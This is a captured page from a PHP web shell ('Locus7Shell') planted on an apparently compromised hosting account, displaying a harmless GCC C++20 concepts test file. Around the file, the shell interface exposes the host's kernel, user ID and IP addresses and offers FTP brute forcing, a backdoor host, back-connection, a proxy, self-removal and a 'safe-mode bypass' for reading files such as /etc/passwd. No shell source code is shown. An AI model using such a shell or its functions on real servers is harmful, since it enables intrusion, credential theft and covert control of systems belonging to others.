Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/cpp2a/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     concepts-traits3.C (3.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// PR c++/100474
// { dg-do compile { target c++20 } }

struct S { S() = delete; S(const S&); };

template<class T>
concept Aggregate = __is_aggregate(T);
// { dg-message "'S' is not an aggregate" "" { target *-*-* } .-1  }

template<class T>
concept TriviallyCopyable = __is_trivially_copyable(T);
// { dg-message "'S' is not trivially copyable" "" { target *-*-* } .-1  }

template<class T, class U>
concept Assignable = __is_assignable(T, U);
// { dg-message "'S' is not assignable from 'int'" "" { target *-*-* } .-1  }

template<class T, class U>
concept TriviallyAssignable = __is_trivially_assignable(T, U);
// { dg-message "'S' is not trivially assignable from 'int'" "" { target *-*-* } .-1  }

template<class T, class U>
concept NothrowAssignable = __is_nothrow_assignable(T, U);
// { dg-message "'S' is not 'nothrow' assignable from 'int'" "" { target *-*-* } .-1  }

template<class T, class... Args>
concept Constructible = __is_constructible(T, Args...);
// { dg-message "'S' is not default constructible" "" { target *-*-* } .-1  }
// { dg-message "'S' is not constructible from 'int'" "" { target *-*-* } .-2  }
// { dg-message "'S' is not constructible from 'int, char'" "" { target *-*-* } .-3  }

template<class T, class... Args>
concept TriviallyConstructible = __is_trivially_constructible(T, Args...);
// { dg-message "'S' is not trivially default constructible" "" { target *-*-* } .-1  }
// { dg-message "'S' is not trivially constructible from 'int'" "" { target *-*-* } .-2  }
// { dg-message "'S' is not trivially constructible from 'int, char'" "" { target *-*-* } .-3  }

template<class T, class... Args>
concept NothrowConstructible = __is_nothrow_constructible(T, Args...);
// { dg-message "'S' is not 'nothrow' default constructible" "" { target *-*-* } .-1  }
// { dg-message "'S' is not 'nothrow' constructible from 'int'" "" { target *-*-* } .-2  }
// { dg-message "'S' is not 'nothrow' constructible from 'int, char'" "" { target *-*-* } .-3  }

template<class T>
concept UniqueObjReps = __has_unique_object_representations(T);
// { dg-message "'S' does not have unique object representations" "" { target *-*-* } .-1  }

static_assert(Aggregate<S>); // { dg-error "assert" }
static_assert(TriviallyCopyable<S>); // { dg-error "assert" }
static_assert(Assignable<S, int>); // { dg-error "assert" }
static_assert(TriviallyAssignable<S, int>); // { dg-error "assert" }
static_assert(NothrowAssignable<S, int>); // { dg-error "assert" }

static_assert(Constructible<S>); // { dg-error "assert" }
static_assert(Constructible<S, int>); // { dg-error "assert" }
static_assert(Constructible<S, int, char>); // { dg-error "assert" }

static_assert(TriviallyConstructible<S>); // { dg-error "assert" }
static_assert(TriviallyConstructible<S, int>); // { dg-error "assert" }
static_assert(TriviallyConstructible<S, int, char>); // { dg-error "assert" }

static_assert(NothrowConstructible<S>); // { dg-error "assert" }
static_assert(NothrowConstructible<S, int>); // { dg-error "assert" }
static_assert(NothrowConstructible<S, int, char>); // { dg-error "assert" }

static_assert(UniqueObjReps<S>); // { dg-error "assert" }

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0052 ]--